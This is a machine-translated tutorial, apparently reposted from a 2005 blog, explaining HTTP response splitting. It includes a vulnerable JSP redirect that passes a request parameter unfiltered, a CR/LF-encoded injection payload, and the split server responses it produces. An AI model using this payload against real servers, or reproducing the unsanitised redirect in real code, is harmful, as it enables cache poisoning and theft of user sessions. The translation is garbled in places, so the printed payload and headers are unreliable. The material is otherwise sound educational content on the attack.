Basic Principles of HTTP response splitting attack

From http://blog.csdn.net/packet/archive/2005/06/05/387977.aspx

 

<-> Principle overview HTTP Response Header truncation is a new attack technology derived from many attack methods: Web Cache configuroning, cross user defacement, cross-site scripting. Attackers can exploit this vulnerability to obtain sensitive user information and even authentication information containing user names and passwords. This attack may occur in many environments, such as Microsoft ASP, asp net, IBM WebSphere, popular servers, Apache, squid, and ie6.0 SP1.

The main cause of the HTTP Response Header Truncation Vulnerability is that illegal characters submitted by users are not strictly filtered, especially Cr and LF characters. By sending a specially crafted request, attackers force the server to think that the returned data is two responses instead of a conventional response. When the second response can be fully controlled through a crafted request, the attack can be implemented by sending two requests a and B. A request contains the constructed data, which causes the server to return two responses, R1 and R2. R2 can be fully controlled by the elaborate structure in. The server returns R1 to a as response, while R2 is returned to B as the server's response even if R2 is not generated by the server itself ).

Request a -------------> Web Server (R1, R2)
Request B -------------> Web Server (originally R3)
Web Server (R1) ------------>
Web Server (R2) ------> B

<2> basic technology: HTTP Response Header truncation attacks focus on inputting data in the HTTP header and constructing special characters for truncation. The most likely is in the location field and in the Set-Cookie field. Instance: page/redir_lang.jsp

<%
Response. sendredirect ("/by_lang.jsp? Lang = "+ request. getparameter (" Lang "); %>

When the English language is submitted as a parameter, it will be transferred to/by_lang.jsp? Lang = English. The general response is as follows:
HTTP/1.1 302 moved temporarily
Date: Wed, 24 Dec 2003 12:53:28
Location: http: // 10.1.1.1/by_lang.jsp? Lang = English
Server: Weblogic xmlx module 8.1 SP1 FIR Jun 20 23:06:40 PDT
2003 271009
Content-Type: text/html
Set-COOKIE: JSESSIONID = 1pmrzoiqqzzie6iivsreg82pq9b017h4yohz62rxjapqwbe! -
12510119693; Path =/connection: Close

............................ Omitted
We can see from the above: the input parameter has been submitted to the HTTP header, so that we can construct a special character to cut off the HTTP header, append a self-constructed header to the end of the header:
/Redir_lang.jsp? Lang = foobar % 0d % 0acontent-length: % 200% 0d % 0a % 0d % oahttp/1.1% 20200% 20ok % 0d % 0acontent-type: % 20 text/html % 0d % 0a % Content-Length: % 2019% 0d % 0a % 0d % 0a <HTML> Shazam

Server return count
HTTP/1.1 302 moved temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http: // 10.1.1.1/by_lang.jsp? Lang = foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1
<HTML> Shazam Server: Weblogic xmlx module 8.1 SP1 FIR Jun 20 23:06:40 PDT
2003 271009
Content-Type: text/html
Set-COOKIE: JSESSIONID = 1pmrzoiqqzzie6iivsreg82pq9b017h4yohz62rxjapqwbe! -12510119693; Path =/
Connection: Close

Note: 1. the first response is 302 response. 2. The second response is a self-constructed 200 response. 3. (The data outside the header is omitted, in fact, the original article exists, and in practice, this section should be considered)
In this way, we can send two requests:

1./redir_lang.jsp? Lang = foobar % 0d % 0acontent-length: % 200% 0d % 0a % 0d % oahttp/1.1% 20200% 20ok % 0d % 0acontent-type: % 20 text/html % 0d % 0a % Content-Length: % 2019% 0d % 0a % 0d % 0a <HTML> Shazam

2./index.htm
In this way, the server returns the first request:
HTTP/1.1 302 moved temporar
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http: // 10.1.1.1/by_lang.jsp? Lang = foobar
Content-Length: 0
For the second request, return:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<HTML> shamaz In this way, the target server is spoofed.

<3> in practice, many factors need to be considered. One of the key factors is how to "Distinguish" two response headers, And the URL input is too long, how to avoid data injection by filtering some special characters, how to force the server to cache, and how to make the two responses exactly return to the two sent requests. (These are complex and must be considered)

More in the original
<Http response splitting, Web Cache attack oning attacks, and Related Topics> White Pape. Amit Klein, directory of Security and Reserch, sanctum, Inc.